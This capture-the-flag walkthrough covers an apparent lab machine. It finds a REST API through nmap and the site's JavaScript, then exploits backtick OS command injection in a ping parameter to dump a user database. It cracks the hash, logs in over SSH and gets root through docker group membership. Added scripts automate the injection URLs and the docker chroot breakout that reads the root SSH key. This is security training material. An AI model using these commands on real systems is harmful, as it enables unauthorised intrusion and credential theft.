Exploit an OS command injection vulnerability, acquire ssh credentials and escalate privileges using a user group assignment mistake.

Access this machine here

Room backstory

It’s enumeration time!

As usual, we start with an nmap scan of the given IP to find open ports. Scanning the full range (1-65535) is justified here: the default top-1000 scan would miss the ports this room asks about.

$ nmap -p 1-65535 <IP> -T5 | tee nmap.out

T5 - sets the timing template to "insane", the fastest nmap offers. It finishes quickly, but on a lossy link it can drop probes and report open ports as closed; -T4 is the safer choice if the results look incomplete.

| - pipe output of the scan to the command on the right side.

tee nmap.out - save piped output to nmap.out while output of the scan is still displayed on the terminal.

Which software is using the port 8081?

$ nmap -sV -p 8081 <IP>

Which other non-standard port is used?

The nmap scan result includes a port number that looks like leetspeak. That's it.

Which software is using this port?

$ nmap -sV -p <PORT> <IP>
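Rather than retyping port numbers from the scan, the service scan can be fed the open ports parsed straight out of nmap.out. The script below is an added example, not part of the original write-up; the nmap output it parses is a constructed sample (the target address, latency and the 22/tcp line are illustrative, 8081 and 31331 are the ports the room asks about).

```shell
#!/bin/sh
# Added example, not part of the original write-up: pull the open TCP ports out
# of the nmap.out file saved by tee so that the follow-up service scan (-sV)
# only touches those ports instead of re-scanning everything.

# Constructed sample of nmap normal output. Host, latency and the 22/tcp line
# are illustrative; 8081 and 31331 are the ports the room asks about.
SAMPLE_NMAP_OUT='Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.10.10
Host is up (0.030s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
8081/tcp  open  blackice-icecap
31331/tcp open  unknown
'

# open_ports FILE -> comma-separated open TCP ports, in the order nmap printed them.
# Only lines whose first field is "<n>/tcp" and whose state is "open" count, so
# header lines and filtered ports are ignored.
open_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             sub(/\/tcp$/, "", $1)
             printf "%s%s", sep, $1
             sep = ","
         }
         END { print "" }' "$1"
}

# nonstandard_ports FILE -> the open ports above 1024, i.e. the ones worth a closer look.
nonstandard_ports() {
    open_ports "$1" | tr ',' '\n' | awk '$1 > 1024' | paste -sd, -
}

# Demo run on the constructed sample: write it to a temp file, as tee would have.
sample=$(mktemp)
printf '%s' "$SAMPLE_NMAP_OUT" > "$sample"
echo "open ports:         $(open_ports "$sample")"
echo "non-standard ports: $(nonstandard_ports "$sample")"
rm -f "$sample"

# Against the real target, after the full scan above:
#   nmap -sV -p "$(open_ports nmap.out)" <IP>
```

Running the service scan only against the parsed list keeps the -sV pass short and avoids transcription mistakes when the full scan turns up an unexpected port.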

The software using the port 8081 is a REST API, how many of its routes are used by the web application?

A brute force of the directories should do the trick here. We therefore assume that the number of directories discovered corresponds to the number of routes. A route that is not in the wordlist would be missed, so treat the count as a lower bound and cross-check it against the JavaScript the front end ships.

Let the fun begin

There is a database lying around, what is its filename?

Checking the directories on the web server running on port 8081 returns nothing helpful, so we turn to the only other port running a web server: port 31331 (the leetspeak port from earlier).

We first visit the URL.

We're first greeted by this UltraTech website.

Other than that we find a bad attempt at hiding a note (white text on a white background, a cliché),

and, after viewing the page source, a comment that seems to signal a dead end. Or is it? No, it really is a dead end.

We therefore opt for a web directory brute force to find any hidden directories.

Browsing through the discovered directories, only /js looks to have anything of interest.

The /js directory contains the JavaScript used by the website, and going through it we find an interesting file, api.js.

The checkAPIstatus() function asks the API to ping the address supplied in the ip parameter, and getAPIURL() builds the API base URL from the host's IP address and port 8081. Substituting those into the value of "const url" gives the request below.

This is what we end up with, and we open it in the browser:

http://<IP>:8081/ping?ip=<IP>

This looks like a candidate for OS command injection: if the server builds a shell command string around the ip parameter, shell metacharacters in the parameter get interpreted. We try substituting system commands for the second <IP>. After several attempts with the ls command, we find that wrapping the command in backticks works: the shell runs the backticked command first and substitutes its output into the ping command line. Therefore,

http://<IP>:8081/ping?ip=`<command>`

Trying it with an ls command:

There is a database lying around, what is its filename?

The ls output above answers this.

What is the first user’s password hash?

cat the database file through the same injection. The browser encodes the space between cat and the filename for you; if you switch to curl or a script, send it as %20 (and the backticks as %60) or the request will not be what you think it is.
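The same injection, scripted: the function below builds the URL for an arbitrary command so that the ls and cat steps above can be repeated from the terminal without relying on the browser's silent URL encoding. This is an added example, not code from the write-up or the room; the host 10.10.10.10 and the filename some.db are placeholders (use the target IP and the name ls returned), while the /ping?ip= route, the 8081 port and the backtick wrapping are the ones found above.

```shell
#!/bin/sh
# Added example, not from the original write-up: build the injection URL for an
# arbitrary command. The /ping?ip= route on port 8081 and the backtick wrapping
# are what the write-up found; 10.10.10.10 and some.db below are placeholders.
# The one thing the browser hides from you is URL encoding: once the command has
# a space in it (cat <file>), curl needs %20, and the backticks are safest as %60.

# urlencode STRING -> STRING with everything but RFC 3986 unreserved characters
# percent-encoded, one byte at a time.
urlencode() {
    printf '%s\n' "$1" | fold -w1 | while IFS= read -r c; do
        case "$c" in
            '') ;;                                # blank line from fold, nothing to emit
            [a-zA-Z0-9._~-]) printf '%s' "$c" ;;  # unreserved, passed through
            *) printf '%%%02X' "'$c" ;;           # everything else as %XX of its byte value
        esac
    done
}

# inject_url HOST COMMAND -> URL whose ip parameter is `COMMAND`, percent-encoded.
inject_url() {
    printf 'http://%s:8081/ping?ip=%s' "$1" "$(urlencode "\`$2\`")"
}

# inject_run HOST COMMAND -> fetch the URL. The command's output comes back in the
# API response because the shell substitutes it into the ping command line.
inject_run() {
    curl -s "$(inject_url "$1" "$2")"
}

# Demo: the URLs for the two commands used in the write-up (no network access).
inject_url 10.10.10.10 'ls'; echo
inject_url 10.10.10.10 'cat some.db'; echo   # some.db is a placeholder filename

# On the real target:
#   inject_run <IP> 'ls'
#   inject_run <IP> 'cat <database file>'
```

The root cause, for the fix side of the same bug, is that the ip parameter reaches a shell at all: validating it as an IP address and passing it to ping as a separate argument (no shell string concatenation) removes the metacharacter problem entirely.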

What is the password associated with this hash?

The password hash can be cracked using CrackStation, which looks the hash up in a table of precomputed hashes.

The root of all evil

What are the first 9 characters of the root user’s private SSH key?

We first SSH into the machine using the credentials found in the previous task.

This task calls for privilege escalation to root. The username r00t shouldn't be confused with root, though: it is an ordinary user. So we have no access to the root directory; trust me, I naively tried cd-ing into it. Don't fall for that too :)

We check whether this user can run any commands as root (sudo -l). Nothing.

Checking for SUID binaries (find / -perm -4000 -type f 2>/dev/null) also turns up nothing we can use.

Running id, however, shows that this user belongs to the docker group.

That is exploitable: members of the docker group can talk to the Docker daemon, which runs as root and will mount any host path into a container on request, so membership is effectively root. We visit GTFOBins for the exact command.

It has an entry for docker, but the command needs an image that is already present on the machine, so we check which ones are available.

Running docker ps -a (which lists containers, stopped ones included) shows a container created from an image called "bash"; docker images lists the image itself.

Running this command should therefore get us root. It mounts the host's / at /mnt inside a throwaway container and chroots into it, so the shell that follows runs as root on the host filesystem:

docker run -v /:/mnt --rm -it bash chroot /mnt sh

We got root!

The SSH key can be found in /root/.ssh/id_rsa; read it from inside the chroot, where /root is the host's root home.
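The checks behind that escalation, written so they work for whatever image happens to be on the box rather than only the "bash" one found here, as an added example that is not part of the original write-up. The docker images output and the group list are constructed samples (the image ID is made up); on the target they come from docker images and id -nG.

```shell
#!/bin/sh
# Added example, not from the original write-up: the checks behind the docker
# group escalation, generalised to whatever image is present locally. Membership
# of the docker group is as good as root because the daemon runs as root and
# will mount the host's / into a container for any member.

# in_group GROUP "GROUPS" -> succeeds if GROUP is one of the space-separated GROUPS
# (feed it the output of `id -nG`).
in_group() {
    for g in $2; do
        [ "$g" = "$1" ] && return 0
    done
    return 1
}

# pick_image "DOCKER_IMAGES_OUTPUT" -> first REPOSITORY:TAG present locally, or nothing.
# The technique needs an image that is already on the machine; nothing can be
# pulled if the target has no route out.
pick_image() {
    printf '%s\n' "$1" | awk 'NR > 1 && $1 != "<none>" { print $1 ":" $2; exit }'
}

# breakout_cmd IMAGE -> the docker command that mounts the host root at /mnt and
# chroots into it: the GTFOBins docker entry with IMAGE in place of "bash".
breakout_cmd() {
    printf 'docker run -v /:/mnt --rm -it %s chroot /mnt sh' "$1"
}

# Constructed sample of `docker images` output (the image ID is made up).
SAMPLE_IMAGES='REPOSITORY   TAG      IMAGE ID       CREATED       SIZE
bash         latest   0123456789ab   2 years ago   12.3MB'

# Demo with constructed data; on the target replace the samples with live output:
#   user_groups=$(id -nG); images=$(docker images)
user_groups="r00t docker"
images="$SAMPLE_IMAGES"
if in_group docker "$user_groups"; then
    img=$(pick_image "$images")
    [ -n "$img" ] && echo "run as r00t: $(breakout_cmd "$img")"
    # Inside the chroot you are root on the host filesystem:
    #   cat /root/.ssh/id_rsa
else
    echo "not in the docker group; look for another vector"
fi
```

Any image with a shell works, not just bash: the container's own filesystem is irrelevant once chroot moves into the mounted host root. The --rm flag removes the container afterwards, but anything written under /mnt lands on the host and stays there.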

Follow for more of the same. Cheers!